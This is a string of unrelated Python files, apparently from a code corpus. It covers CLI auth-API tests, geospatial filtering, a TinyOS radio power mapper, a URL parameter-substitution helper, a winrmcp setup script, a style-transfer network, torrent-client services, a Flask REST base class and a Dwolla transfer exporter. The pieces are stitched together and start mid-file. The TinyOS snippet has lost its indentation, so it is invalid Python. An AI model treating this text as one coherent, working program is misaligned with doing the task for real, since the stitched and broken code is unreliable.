                      "http://auth.example.org/user/tokens/",
                      json=login_response, status=201)
        result = self.runner.invoke(cli, ['auth-user-add'])
        self.assertEqual(result.exit_code, 2)
        self.assertTrue(
            "Please specify all new user information. See --help."
            in result.output)

    @responses.activate
    def test_user_add(self):
        """Happy path: the CLI POSTs to /users/ and reports the new id."""
        # setup
        login_response = {
            "token": "3e6de6f2cace86d3ac22d0a58e652f4b283ab58c"
        }
        responses.add(responses.POST,
                      "http://auth.example.org/user/tokens/",
                      json=login_response, status=201)
        user_response = {
            "id": "3",
            "url": "http://auth.example.org/users/9/",
            "first_name": "First",
            "last_name": "Last",
            "email": "<EMAIL>",
            "admin": False,
            "teams": [],
            "organizations": [],
            "active": False
        }
        responses.add(responses.POST,
                      "http://auth.example.org/users/",
                      json=user_response, status=200)
        # Execute
        result = self.invoke_user_add([])
        # Check
        self.assertEqual(result.exit_code, 0)
        self.assertTrue("Creating account for <EMAIL>"
                        in result.output)
        self.assertTrue("Created user. ID is 3." in result.output)
        self.assertEqual(len(responses.calls), 2)
        self.assertEqual(responses.calls[1].request.url,
                         "http://auth.example.org/users/")

    @responses.activate
    def test_user_add_admin(self):
        """Same as test_user_add but with the --admin flag set."""
        # setup
        login_response = {
            "token": "3e6de6f2cace86d3ac22d0a58e652f4b283ab58c"
        }
        responses.add(responses.POST,
                      "http://auth.example.org/user/tokens/",
                      json=login_response, status=201)
        user_response = {
            "id": "3",
            "url": "http://auth.example.org/users/9/",
            "first_name": "First",
            "last_name": "Last",
            "email": "<EMAIL>",
            "admin": False,
            "teams": [],
            "organizations": [],
            "active": True
        }
        responses.add(responses.POST,
                      "http://auth.example.org/users/",
                      json=user_response, status=200)
        # Execute
        result = self.invoke_user_add([], admin=True)
        # Check
        self.assertEqual(result.exit_code, 0)
        self.assertTrue("Creating account for <EMAIL>"
                        in result.output)
        self.assertTrue("Created user. ID is 3." in result.output)
        self.assertEqual(len(responses.calls), 2)
        self.assertEqual(responses.calls[1].request.url,
                         "http://auth.example.org/users/")

    @responses.activate
    def test_user_change_password(self):
        """The CLI looks up the user by email, then PUTs the new password."""
        login_response = {
            "token": "<PASSWORD>"
        }
        responses.add(responses.POST,
                      "http://auth.example.org/user/tokens/",
                      json=login_response, status=201)
        users_response = [{
            'email': '<EMAIL>',
        }, {
            'id': 2,
            'email': '<EMAIL>'
        }]
        responses.add(responses.GET,
                      "http://auth.example.org/users/",
                      json=users_response, status=200)
        responses.add(responses.PUT,
                      "http://auth.example.org/users/2/",
                      json={}, status=200)
        result = self.invoke_user_change_password(
            [], email='<EMAIL>', password='<PASSWORD>')
        self.assertEqual(result.exit_code, 0)
        self.assertTrue(
            'Changing password for <EMAIL>' in result.output)
        self.assertEqual(len(responses.calls), 3)
        self.assertEqual(
            json.loads(responses.calls[2].request.body)['password'],
            '<PASSWORD>')

    def test_user_add_team_help(self):
        result = self.runner.invoke(cli, ['auth-user-add-team', '--help'])
        self.assertEqual(result.exit_code, 0)
        self.assertTrue(
            "Add a user to a team"
            in result.output)

    @responses.activate
    def test_user_add_user_team_no_details(self):
        """Missing user/team ids must exit with usage error (code 2)."""
        # setup
        login_response = {
            "token": "3e6de6f2cace86d3ac22d0a58e652f4b283ab58c"
        }
        responses.add(responses.POST,
                      "http://auth.example.org/user/tokens/",
                      json=login_response, status=201)
        result = self.runner.invoke(cli, ['auth-user-add-team'])
        self.assertEqual(result.exit_code, 2)
        self.assertTrue(
            "Please specify user and team. See --help."
            in result.output)
# -*- coding: utf-8 -*-
import pandas as pd
import geopandas as gpd
import matplotlib.cm as cm
import matplotlib.pyplot as plt
import descartes
import jellyfish
from shapely import geometry
from shapely.geometry import Point
from shapely.geometry.polygon import Polygon
def get_agricultural_moughataa():
    """Return identifiers ('X.1') of moughataas that intersect the
    agricultural livelihood zone (LZNUM == 9)."""
    moughataa = gpd.read_file('./Moughataas_new.geojson')
    zone_me = gpd.read_file("./Zones de moyen d'existence.geojson")
    # Geometry of the agricultural livelihood zone.
    area_culture_polygon = zone_me[zone_me['LZNUM'] == 9].geometry
    for row in range(len(moughataa.index)):
        overlap = area_culture_polygon.intersection(moughataa.loc[row, 'geometry'])
        # Non-empty intersection means the moughataa touches the zone.
        moughataa.loc[row, 'in_culture_area'] = not overlap.is_empty.iloc[0]
    selected = moughataa[moughataa['in_culture_area'] == True]
    return list(selected['X.1'])
def get_agricultural_commune():
    """Return names ('NAME_3') of communes that intersect the
    agricultural livelihood zone (LZNUM == 9)."""
    commune = gpd.read_file('./Communes.geojson')
    zone_me = gpd.read_file("./Zones de moyen d'existence.geojson")
    # Geometry of the agricultural livelihood zone.
    area_culture_polygon = zone_me[zone_me['LZNUM'] == 9].geometry
    for row in range(len(commune.index)):
        overlap = area_culture_polygon.intersection(commune.loc[row, 'geometry'])
        # Non-empty intersection means the commune touches the zone.
        commune.loc[row, 'in_culture_area'] = not overlap.is_empty.iloc[0]
    selected = commune[commune['in_culture_area'] == True]
    return list(selected['NAME_3'])
| StarcoderdataPython |
3461257 | <reponame>tinyos-io/tinyos-3.x-contrib
def map_cc2420(power):
    """Map power levels for the cc2420 radio onto a gain.

    Placeholder: no cc2420 mapping has been implemented yet.
    """
    raise NotImplementedError
def map_normalized_direct(power):
    """Map a power level onto a gain in dBm.

    A level of X maps directly to (X - 127) dBm, so the maximum level
    (power == 127) gives 0 dBm and the minimum (power == 0) gives
    -127 dBm.
    """
    return power - 127
def bootstrapTxPower (tx_power, dyn_topo, power_map=map_normalized_direct):
"""
Create linkings between a TxPower object and a DynTopo object.
"""
def power_change (mote_id, power):
try:
gain = power_map(power)
# print "Mote %d changed power to %d (%d)" % (mote_id, power, gain)
n = dyn_topo.getNode(mote_id)
n.set_txgain(gain)
except:
print "Error changing power"
finally:
return power
def power_inspect (mote_id):
try:
# print "Mote %d inspected power" % mote_id
n = dyn_topo.getNode(mote_id)
except:
print "Error inspecting power"
finally:
return n.ro_txgain
tx_power.setChangeFunction(power_change)
tx_power.setInspectFunction(power_inspect)
| StarcoderdataPython |
from jeweler.bracelet import bracelet_fc
def test_bracelet_fc():
    """Smoke-test bracelet_fc: print its help, its result items, then
    the remaining items after deleting everything from index 2 on."""
    help(bracelet_fc)
    result = bracelet_fc(6, 3, [1, 2, 3])
    print(type(result))
    for i in result:
        print(i)
    print()
    # Result must support slice deletion (list-like).
    del result[2:]
    for i in result:
        print(i)


if __name__ == "__main__":
    test_bracelet_fc()
1850326 | <reponame>Abdulrahman-Kamel/exurl<gh_stars>1-10
from urllib.parse import urlsplit,parse_qs
# Extract the query-string parameters of a URL in parse_qs format,
# e.g. {'paramName': ['value'], 'age': ['33'], 'name': ['dekart']}
def query(url):
    """Return the URL's query parameters as a dict of value lists."""
    return parse_qs(urlsplit(url).query)
# Flatten a parse_qs-style mapping down to just the parameter values.
def params_value(dct):
    """Return the first value of every parameter in ``dct``, in order.

    ``dct`` is a parse_qs-style mapping (name -> list of values).
    """
    # Comprehension replaces the original append loop (same order/result).
    return [value[0] for value in dct.values()]
# Split one URL into per-parameter variants.
def split_url(url, replaceMe):
    """Return one variant of ``url`` per query parameter, with that
    parameter's value substituted by ``replaceMe``.

    Note: substitution is a plain string replace, so a value that also
    occurs elsewhere in the URL is replaced there too.
    """
    # Comprehension replaces the original append loop; the unused
    # ``params_value_list`` local from the original is dropped.
    return [url.replace(param_value, replaceMe)
            for param_value in params_value(query(url))]
# Split many URLs into per-parameter variants.
def split_urls(urls, replaceMe):
    """Return, for every URL in ``urls``, one variant per query
    parameter with that parameter's value substituted by ``replaceMe``.

    Variants are emitted in input order: all variants of the first URL,
    then the second, and so on (same caveat as ``split_url`` about plain
    string replacement).
    """
    # Nested comprehension replaces the original double loop; the unused
    # ``params_value_list`` local from the original is dropped.
    return [url.replace(param_value, replaceMe)
            for url in urls
            for param_value in params_value(query(url))]
import sys
from setuptools import setup, find_packages
from winrmcp import __version__, __description__, __author__, __author_email__, __url__
# Use the README as the long description shown on PyPI.
with open('README.md') as f:
    long_description = f.read()

setup(
    name = 'winrmcp',
    version = __version__,
    description = __description__,
    author = __author__,
    author_email= __author_email__,
    long_description=long_description,
    long_description_content_type='text/markdown',
    url = __url__,
    license ='MIT',
    classifiers=[
        'Development Status :: 4 - Beta',
        'Intended Audience :: Developers',
        'Programming Language :: Python :: 3 :: Only',
        'Programming Language :: Python :: 3.7',
        'Programming Language :: Python :: 3.8',
        "License :: OSI Approved :: MIT License",
        "Operating System :: OS Independent",
    ],
    packages=find_packages(),
    python_requires='>=3.6',
    install_requires=['pywinrm'],
    # Optional auth back-ends, mirrored from pywinrm's own setup.py.
    extras_require={  # from pywinrm's setup.py
        'credssp': ['requests-credssp>=1.0.0'],
        'kerberos:sys_platform=="win32"': ['winkerberos>=0.5.0'],
        'kerberos:sys_platform!="win32"': ['pykerberos>=1.2.1,<2.0.0']
    },
)
import torch
from collections import namedtuple
from torchvision import models
import torch.nn as nn
import torch.nn.functional as F
class TransformerNet(torch.nn.Module):
    """Image transformation network: downsampling convolutions, five
    residual blocks, then upsampling convolutions back to 3 channels.
    The final layer has no normalisation or activation."""

    def __init__(self):
        super(TransformerNet, self).__init__()
        self.model = nn.Sequential(
            # Encoder: widen channels while halving spatial size twice.
            ConvBlock(3, 32, kernel_size=9, stride=1),
            ConvBlock(32, 64, kernel_size=3, stride=2),
            ConvBlock(64, 128, kernel_size=3, stride=2),
            # Bottleneck of residual blocks at constant width.
            ResidualBlock(128),
            ResidualBlock(128),
            ResidualBlock(128),
            ResidualBlock(128),
            ResidualBlock(128),
            # Decoder: upsample back to the input resolution.
            ConvBlock(128, 64, kernel_size=3, upsample=True),
            ConvBlock(64, 32, kernel_size=3, upsample=True),
            ConvBlock(32, 3, kernel_size=9, stride=1, normalize=False, relu=False),
        )

    def forward(self, x):
        return self.model(x)
class ResidualBlock(torch.nn.Module):
    """Two 3x3 ConvBlocks with a skip connection; channel count is
    preserved so the input can be added to the block's output."""

    def __init__(self, channels):
        super(ResidualBlock, self).__init__()
        self.block = nn.Sequential(
            ConvBlock(channels, channels, kernel_size=3, stride=1, normalize=True, relu=True),
            # Second conv has no activation; ReLU is not applied after the add.
            ConvBlock(channels, channels, kernel_size=3, stride=1, normalize=True, relu=False),
        )

    def forward(self, x):
        return self.block(x) + x
class ConvBlock(torch.nn.Module):
    """Reflection-padded convolution with optional nearest-neighbour
    upsampling, instance normalisation and ReLU activation.

    Attribute names (``block``, ``norm``) are part of the state_dict
    layout and must not be renamed.
    """

    def __init__(self, in_channels, out_channels, kernel_size, stride=1, upsample=False, normalize=True, relu=True):
        super(ConvBlock, self).__init__()
        self.upsample = upsample
        # Reflection padding preserves spatial size (for stride 1) while
        # avoiding zero-padding border artefacts.
        padding = kernel_size // 2
        self.block = nn.Sequential(
            nn.ReflectionPad2d(padding),
            nn.Conv2d(in_channels, out_channels, kernel_size, stride),
        )
        self.norm = nn.InstanceNorm2d(out_channels, affine=True) if normalize else None
        self.relu = relu

    def forward(self, x):
        if self.upsample:
            x = F.interpolate(x, scale_factor=2)
        out = self.block(x)
        if self.norm is not None:
            out = self.norm(out)
        return F.relu(out) if self.relu else out
| StarcoderdataPython |
# src/cloud.py
#! /usr/bin/env python
# Copyright 2016 WebAssembly Community Group participants
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import proc
CLOUD_STORAGE_BASE_URL = 'https://storage.googleapis.com/'
CLOUD_STORAGE_PATH = 'wasm-llvm/builds/'
def Upload(local, remote):
    """Upload file to Cloud Storage.

    No-op (returns None) unless running under a buildbot; otherwise
    returns the public URL of the uploaded object.
    """
    if not os.environ.get('BUILDBOT_BUILDERNAME'):
        return
    dest = CLOUD_STORAGE_PATH + remote
    cmd = ['gsutil.py', 'cp', '-a', 'public-read', local, 'gs://' + dest]
    proc.check_call(cmd)
    return CLOUD_STORAGE_BASE_URL + dest
def Copy(copy_from, copy_to):
    """Copy from one Cloud Storage file to another.

    No-op (returns None) unless running under a buildbot; otherwise
    returns the public URL of the destination object.
    """
    if not os.environ.get('BUILDBOT_BUILDERNAME'):
        return
    src = CLOUD_STORAGE_PATH + copy_from
    dst = CLOUD_STORAGE_PATH + copy_to
    cmd = ['gsutil.py', 'cp', '-a', 'public-read', 'gs://' + src, 'gs://' + dst]
    proc.check_call(cmd)
    return CLOUD_STORAGE_BASE_URL + dst
def Download(remote, local):
    """Download a Cloud Storage object to a local path.

    Unlike Upload/Copy, this runs unconditionally (no buildbot guard).
    """
    src = CLOUD_STORAGE_PATH + remote
    proc.check_call(['gsutil.py', 'cp', 'gs://' + src, local])
| StarcoderdataPython |
import asyncio
import logging
import signal
from asyncio import FIRST_COMPLETED
from collections import OrderedDict
from io import BytesIO
from pathlib import Path
from typing import (
Set,
MutableSequence,
Mapping,
Tuple,
Sequence,
MutableMapping,
Optional,
cast,
Iterable,
AsyncGenerator,
)
from urllib.parse import urlparse
from clutchless.domain.torrent import MetainfoFile
from clutchless.external.metainfo import (
MetainfoIO,
TorrentData,
TorrentDataLocator,
)
from clutchless.external.result import QueryResult, CommandResult
from clutchless.external.transmission import TransmissionApi
logger = logging.getLogger(__name__)
class AddService:
    """Adds torrents to Transmission, accumulating per-call results in
    the instance's success/fail/found/link/error lists."""

    def __init__(self, api: TransmissionApi):
        self.api = api
        # Metainfo files successfully added (with or without data).
        self.success: MutableSequence[MetainfoFile] = []
        # Successfully added, but with no local data located.
        self.added_without_data: MutableSequence[MetainfoFile] = []
        # these are added together (if linking)
        # found -> metainfo file path
        self.found: MutableSequence[MetainfoFile] = []
        # link -> data location path
        self.link: MutableSequence[Path] = []
        # these are added together
        self.fail: MutableSequence[MetainfoFile] = []
        self.error: MutableSequence[str] = []

    def add(self, file: MetainfoFile):
        """Add a torrent without local data; record success or failure."""
        path = cast(Path, file.path)
        result = self.api.add_torrent(path)
        if result.success:
            self.success.append(file)
            self.added_without_data.append(file)
        else:
            self.fail.append(file)
            self.error.append(result.error or "empty error string")

    def add_with_data(self, file: MetainfoFile, data_path: Path):
        """Add a torrent linked to its located data directory."""
        path = cast(Path, file.path)
        result = self.api.add_torrent_with_files(path, data_path)
        if result.success:
            self.success.append(file)
            self.found.append(file)
            self.link.append(data_path)
        else:
            self.fail.append(file)
            self.error.append(result.error or "empty error string")
class LinkOnlyAddService(AddService):
    """AddService variant whose plain ``add`` is a no-op, so torrents are
    only ever added when their data was located (via ``add_with_data``)."""

    # NOTE(review): parameter is annotated ``path: Path`` while the base
    # class's ``add`` takes a ``MetainfoFile`` — confirm intended.
    def add(self, path: Path):
        pass
class FindService:
    """Searches the filesystem (via a TorrentDataLocator) for the data
    belonging to metainfo files, with async, blocking-with-timeout and
    interruptible front-ends."""

    def __init__(self, data_locator: TorrentDataLocator):
        self.data_locator = data_locator

    async def find_async(
        self, files: Set[MetainfoFile]
    ) -> AsyncGenerator[TorrentData, None]:
        """Yield TorrentData results as each locator task completes.

        On cancellation/close, cancels the remaining tasks, awaits them,
        and yields whatever results they produced before stopping.
        """
        pending = {asyncio.create_task(self.data_locator.find(file)) for file in files}
        logger.info(f"{pending}")
        while pending:
            try:
                logger.info(f"pre-await {pending}")
                done, pending = await asyncio.wait(pending, return_when=FIRST_COMPLETED)
                logger.info(f"post-wait {done, pending}")
                while done:
                    d = done.pop()
                    logger.info(f"yielding result {d}")
                    yield d.result()
            except (GeneratorExit, asyncio.CancelledError) as e:
                logger.info(f"exiting find_async {type(e)}")
                for task in pending:
                    task.cancel()
                for task in pending:
                    await task
                    yield task.result()
                break

    def find_blocking(
        self, files: Set[MetainfoFile], timeout: float
    ) -> Iterable[TorrentData]:
        """Run all locator tasks, giving up after ``timeout`` seconds.

        Tasks still pending at the deadline are cancelled and awaited;
        the results of all tasks (done and cancelled) are returned.
        """
        async def _wait():
            coros = [self.data_locator.find(file) for file in files]
            done, pending = await asyncio.wait(coros, timeout=timeout)
            logger.info(f"finished asyncio.wait in find service")
            for task in pending:
                task.cancel()
            for task in pending:
                await task
            return [task.result() for task in done | pending]

        return asyncio.run(_wait())

    def find(self, metainfo_files: Iterable[MetainfoFile]) -> Iterable[TorrentData]:
        """Interactive search: prints progress and supports Ctrl+C.

        Returns the sequence of TorrentData collected so far; SIGINT
        cancels the search but still returns partial results.
        """
        metainfo_files = set(metainfo_files)

        async def _find_subroutine():
            collected: MutableSequence[TorrentData] = []
            completion_count = len(metainfo_files)
            found_count = 0
            generator = self.find_async(metainfo_files)
            while True:
                try:
                    result = await generator.__anext__()
                    collected.append(result)
                    logger.info(f"found {result}")
                    if result.location:
                        found_count += 1
                        print(
                            f"{found_count}/{completion_count} {result.metainfo_file} found at {result.location}"
                        )
                except StopAsyncIteration:
                    logger.info(f"generator exit")
                    break
                except asyncio.CancelledError:
                    # Close the generator; its drain yields remaining
                    # results, then __anext__ raises StopAsyncIteration.
                    logger.info(f"closing generator")
                    await generator.aclose()
            logger.info(f"finished find subroutine collecting {collected}")
            return collected

        async def _main():
            print(f"Starting search - press Ctrl+C to cancel")
            find_task = asyncio.create_task(_find_subroutine())
            loop = asyncio.get_event_loop()

            def _interrupt():
                find_task.cancel()

            loop.add_signal_handler(signal.SIGINT, _interrupt)
            results = await find_task
            return results

        return asyncio.run(_main())
class ExcludingFindService(FindService):
    """FindService variant that never reports missing files: the second
    element of the returned tuple is always an empty set."""

    def find(
        self, metainfo_files: Set[MetainfoFile]
    ) -> Tuple[Set[TorrentData], Set[MetainfoFile]]:
        # BUGFIX: FindService.find returns a single sequence of
        # TorrentData, so the original two-target unpacking
        # (``found, rest = super().find(...)``) would fail at runtime.
        # Assumes TorrentData is hashable — TODO confirm.
        found = set(super(ExcludingFindService, self).find(metainfo_files))
        return found, set()
class LinkDataService:
    """Low-level Transmission operations used when re-linking torrent data.

    Every method raises RuntimeError when the underlying API call reports
    failure, so callers may assume success on return.
    """

    def __init__(self, api: TransmissionApi, metainfo_io: MetainfoIO):
        self.api = api
        self.metainfo_io = metainfo_io

    def __query_incomplete_ids(self) -> Set[int]:
        # Ids of torrents whose data is currently incomplete.
        id_result: QueryResult[Set[int]] = self.api.get_incomplete_ids()
        if not id_result.success:
            raise RuntimeError("failed incomplete_ids query")
        return id_result.value or set()

    def __query_metainfo_file_by_id(
        self, incomplete_ids: Set[int]
    ) -> Mapping[int, Path]:
        query_result: QueryResult[
            Mapping[int, Path]
        ] = self.api.get_metainfo_file_paths_by_id(incomplete_ids)
        if not query_result.success:
            raise RuntimeError("failed torrent_name_by_id query")
        return query_result.value or dict()

    def __get_metainfo_path_by_id(self) -> Mapping[int, Path]:
        incomplete_ids: Set[int] = self.__query_incomplete_ids()
        logger.debug(f"incomplete ids:{incomplete_ids}")
        return self.__query_metainfo_file_by_id(incomplete_ids)

    def get_incomplete_metainfo_path_by_id(self) -> Mapping[int, Path]:
        """Map each incomplete torrent id to its metainfo (.torrent) path."""
        return self.__get_metainfo_path_by_id()

    def change_location(self, torrent_id: int, new_path: Path):
        result: CommandResult = self.api.change_torrent_location(
            torrent_id, new_path
        )
        if not result.success:
            raise RuntimeError("failed to change torrent location")

    def remove_by_id(self, torrent_id: int):
        # Removes only the torrent entry; the downloaded data is kept.
        result: CommandResult = self.api.remove_torrent_keeping_data(torrent_id)
        if not result.success:
            raise RuntimeError(f"failed to remove torrent with id:{torrent_id}")

    def get_metainfo_raw_value(self, path: Path) -> bytes:
        return self.metainfo_io.get_bytes(path)

    def restore_metainfo(self, value: bytes, path: Path):
        self.metainfo_io.write_bytes(value, path)

    def add_with_paths(self, metainfo_path: Path, data_path: Path):
        result = self.api.add_torrent_with_files(metainfo_path, data_path)
        if not result.success:
            raise RuntimeError(
                f"failed to add data files from:f{data_path} for metainfo file:f{metainfo_path}"
            )

    def get_hash_with_torrent_id(self, torrent_id: int) -> str:
        result = self.api.get_torrent_hashes_by_id()
        if not result.success:
            raise RuntimeError(f"failed to retrieve torrent hashes by id")
        return result.value[torrent_id]

    def get_torrent_id_with_hash(self, torrent_hash: str) -> int:
        result = self.api.get_torrent_ids_by_hash()
        if not result.success:
            raise RuntimeError(f"failed to retrieve torrent ids by hash")
        return result.value[torrent_hash]

    def trigger_verify(self, torrent_id: int):
        result = self.api.verify(torrent_id)
        if not result.success:
            raise RuntimeError(f"failed to verify torrent")
class LinkService:
    """Re-links torrent metainfo files to data found on disk."""

    def __init__(self, metainfo_reader: MetainfoIO, data_service: LinkDataService):
        self.metainfo_reader = metainfo_reader
        self.data_service = data_service

    def get_incomplete_id_by_metainfo_file(self) -> Mapping[MetainfoFile, int]:
        """Invert the id->path mapping into parsed-metainfo->id."""
        path_by_id = self.data_service.get_incomplete_metainfo_path_by_id()
        by_file = {}
        for torrent_id, path in path_by_id.items():
            by_file[self.metainfo_reader.from_path(path)] = torrent_id
        return by_file

    def change_location(self, torrent_id: int, metainfo_path: Path, new_path: Path):
        """Re-add the torrent pointing at new_path, then trigger a verify.

        The raw metainfo bytes are captured before removal and written back
        afterwards — presumably because removal can delete the .torrent file
        (TODO confirm against the Transmission client behaviour).
        The step order below is load-bearing; do not reorder.
        """
        raw_value = self.data_service.get_metainfo_raw_value(metainfo_path)
        torrent_hash = self.data_service.get_hash_with_torrent_id(torrent_id)
        self.data_service.remove_by_id(torrent_id)
        self.data_service.restore_metainfo(raw_value, metainfo_path)
        self.data_service.add_with_paths(metainfo_path, new_path)
        new_id = self.data_service.get_torrent_id_with_hash(torrent_hash)
        self.data_service.trigger_verify(new_id)
class DryRunLinkService(LinkService):
    # Dry-run variant: inherits all the queries but makes relocation a no-op,
    # so a run can be previewed without touching the Transmission daemon.
    def change_location(self, torrent_id: int, metainfo_path: Path, new_path: Path):
        pass
class AnnounceUrl:
    """Wraps a tracker announce URL and derives a display name from its host."""

    def __init__(self, announce_url: str):
        self.announce_url = announce_url

    @property
    def formatted_hostname(self) -> Optional[str]:
        """CamelCase name built from the (shortened) hostname, or None when
        the URL has no parseable hostname."""
        hostname = urlparse(self.announce_url).hostname
        if hostname is None:
            return None
        parts = self.split_hostname(hostname)
        return "".join(word.capitalize() for word in parts)

    @staticmethod
    def split_hostname(hostname: str) -> Sequence[str]:
        """Keep only the last two dot-separated labels of a long hostname."""
        labels = hostname.split(".")
        return labels[-2:] if len(labels) > 2 else labels
class PruneService:
    """Queries used to prune torrents whose data has gone missing."""

    def __init__(self, client: TransmissionApi):
        self.client = client

    def get_torrent_hashes(self) -> Set[str]:
        """All torrent hashes currently known to the client."""
        query: QueryResult[Mapping[str, int]] = self.client.get_torrent_ids_by_hash()
        if not query.success:
            raise RuntimeError("get_torrent_ids_by_hash query failed")
        return set((query.value or dict()).keys())

    def get_torrent_name_by_id_with_missing_data(self) -> Mapping[int, str]:
        query: QueryResult[
            Mapping[int, str]
        ] = self.client.get_torrent_names_by_id_with_missing_data()
        if not query.success:
            raise RuntimeError("get_torrent_names_by_id_with_missing_data query failed")
        return query.value or dict()

    def remove_torrent(self, torrent_id: int):
        # Removes the torrent entry only; any data on disk is kept.
        result: CommandResult = self.client.remove_torrent_keeping_data(torrent_id)
        if not result.success:
            raise RuntimeError("failed remove_torrent command", result)
class OrganizeService:
    """
    Queries Transmission for all announce urls and collects a sorted map of
    shortened, camel-case hostname -> announce urls (each url list sorted too).
    """

    def __init__(self, client: TransmissionApi, metainfo_reader: MetainfoIO):
        self.client = client
        self.metainfo_reader = metainfo_reader

    def get_announce_urls_by_folder_name(self) -> "OrderedDict[str, Sequence[str]]":
        query_result: QueryResult[Set[str]] = self.client.get_announce_urls()
        if not query_result.success:
            raise RuntimeError("get_announce_urls query failed")
        grouped = self._get_groups_by_name(query_result.value or set())
        return self._sort_url_sets(self._sort_groups_by_name(grouped))

    @staticmethod
    def _sort_url_sets(
        groups_by_name: Mapping[str, Set[str]]
    ) -> "OrderedDict[str, Sequence[str]]":
        # Preserve the group order of the input, sort each url set.
        return OrderedDict(
            (name, sorted(urls)) for name, urls in groups_by_name.items()
        )

    @staticmethod
    def _sort_groups_by_name(
        groups: Mapping[str, Set[str]]
    ) -> "OrderedDict[str, Set[str]]":
        return OrderedDict(sorted(groups.items()))

    @staticmethod
    def _get_groups_by_name(announce_urls: Set[str]) -> Mapping[str, Set[str]]:
        """Groups announce_urls by shortened camel-case hostname."""
        trackers: MutableMapping[str, Set[str]] = {}
        for url in announce_urls:
            try:
                hostname = AnnounceUrl(url).formatted_hostname
            except IndexError:
                # Unparseable url: skip it.
                continue
            if hostname is None:
                continue
            trackers.setdefault(hostname, set()).add(url)
        return trackers

    def get_announce_urls_by_torrent_id(self) -> Mapping[int, Set[str]]:
        result: QueryResult[Mapping[int, Set[str]]] = self.client.get_torrent_trackers()
        if not result.success:
            raise RuntimeError("get_torrent_trackers query failed")
        return result.value or dict()

    def move_location(self, torrent_id: int, new_path: Path):
        result: CommandResult = self.client.move_torrent_location(
            torrent_id, new_path
        )
        if not result.success:
            raise RuntimeError("failed to change torrent location")

    def get_torrent_location(self, torrent_id: int) -> Path:
        result: QueryResult[Path] = self.client.get_torrent_location(torrent_id)
        if not result.success or result.value is None:
            raise RuntimeError("get_torrent_location query failed")
        return result.value

    def get_metainfo_file(self, torrent_id: int) -> MetainfoFile:
        result: QueryResult[Path] = self.client.get_metainfo_file_path(torrent_id)
        if not result.success or result.value is None:
            # NOTE: message mirrors get_torrent_location; kept for compatibility.
            raise RuntimeError("get_torrent_location query failed")
        return self.metainfo_reader.from_path(result.value)
| StarcoderdataPython |
242953 | <filename>hkust-gmission/gmission/rest/base.py<gh_stars>100-1000
from flask import request
from gmission.blueprints.user import jwt_auth
__author__ = 'chenzhao'
import inspect
class ReSTBase(object):
    """Base class that discovers REST pre/post-processors by naming convention.

    Subclasses define methods named ``before_<op>`` / ``after_<op>`` (or
    ``universal_before_*`` / ``universal_after_*``); the helpers below collect
    them into {'<OPERATION>': [callable]} dictionaries, apparently in the
    shape Flask-Restless expects (NOTE(review): confirm against the consumer).
    """
    @classmethod
    def universal_before_post(cls, data):
        # print 'Universal before_post'
        # Never trust a client-supplied primary key on POST.
        data.pop('id', None)
    @classmethod
    def universal_after_get_many(cls, result=None, search_params=None, **kwargs):
        # HEAD requests need headers only, so drop the (possibly large) payload.
        if request.method == 'HEAD':
            if result is not None:
                result.pop('objects', [])
        pass
    @classmethod
    @jwt_auth()
    def check_user_token(cls, **kw):
        # Authentication gate; jwt_auth() presumably aborts on a bad token.
        return True
    @classmethod
    def processor_name_mapping(cls, prefix):
        # Collect every method whose name starts with ``prefix`` under the
        # upper-cased remainder of its name, e.g. 'before_post' -> 'POST'.
        # NOTE(review): inspect.ismethod only matches bound methods — under
        # Python 3 plain methods on a class object are functions, so this
        # reads as Python 2 era code; confirm before porting.
        exclude_list = []
        processors = {}
        processors_fields = ['GET_SINGLE', 'GET_MANY', 'PATCH_SINGLE', 'PATCH_MANY', 'PUT_SINGLE', 'PUT_MANY', 'POST',
                             'DELETE']
        for raw_method in inspect.getmembers(cls, predicate=inspect.ismethod):
            name, method = raw_method
            if name.startswith(prefix):
                # +1 skips the underscore separating prefix from operation.
                processors[name[len(prefix) + 1:].upper()] = [method.__get__(cls), ]
        # if cls.__name__ not in exclude_list and prefix == 'before':
        #     for key in processors_fields:
        #         preprocessor = processors.get(key, [])
        #         preprocessor.insert(0, cls.check_user_token)
        #         processors[key] = preprocessor
        return processors
    @classmethod
    def universal_preprocessors(cls):
        prefix = 'universal_before'
        return ReSTBase.processor_name_mapping(prefix)
    @classmethod
    def universal_postprocessors(cls):
        prefix = 'universal_after'
        return ReSTBase.processor_name_mapping(prefix)
    @classmethod
    def rest_preprocessors(cls):
        prefix = 'before'
        return cls.processor_name_mapping(prefix)
    @classmethod
    def rest_postprocessors(cls):
        prefix = 'after'
        return cls.processor_name_mapping(prefix)
    @classmethod
    def rest_exclude_columns(cls):
        # r = [cln for cln in cls.__mapper__.columns if isinstance(cln, db.RelationshipProperty)]
        # Attribute names of all SQLAlchemy relationships on the mapped class.
        return [str(r).split('.')[1] for r in cls.__mapper__.relationships]
| StarcoderdataPython |
3232763 | import csv
import dwollav2
# Export every transfer of one Dwolla customer to <customer_id>.csv.
client = dwollav2.Client(
    key='REPLACE WITH CLIENT ID',
    secret='REPLACE WITH SECRET KEY',
    environment='sandbox'  # Set to sandbox, change to production if needed
)
customer_id = 'REPLACE WITH CUSTOMER ID'

# Obtain an application token and fetch the first page of transfers.
token = client.Auth.client()
url = f'customers/{customer_id}/transfers'
res = token.get(url)
transfers = res.body['_embedded']['transfers']

# Walk the paginated result set, flattening each transfer into a row dict.
transactions = []
while True:
    for transfer in transfers:
        transactions.append({
            'ID': transfer['id'],
            'Created': transfer['created'],
            'Status': transfer['status'],
            'Amount': transfer['amount']['value'],
        })
    links = res.body['_links']
    if 'next' not in links:
        break
    res = token.get(links['next']['href'])
    transfers = res.body['_embedded']['transfers']

# Write the collected rows out as CSV.
fields = ['ID', 'Created', 'Status', 'Amount']
filename = f'{customer_id}.csv'
with open(filename, 'w') as f:
    writer = csv.DictWriter(f, fields)
    writer.writeheader()
    writer.writerows(transactions)
| StarcoderdataPython |
1618835 | <reponame>ImJuanan/flask-milligram
# -*- coding: utf-8 -*-
import random
from flask import Flask, render_template, request
from flask_milligram import Milligram
from flask_sqlalchemy import SQLAlchemy
app = Flask(__name__)
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///:memory:'
milligram = Milligram(app)
db = SQLAlchemy(app)
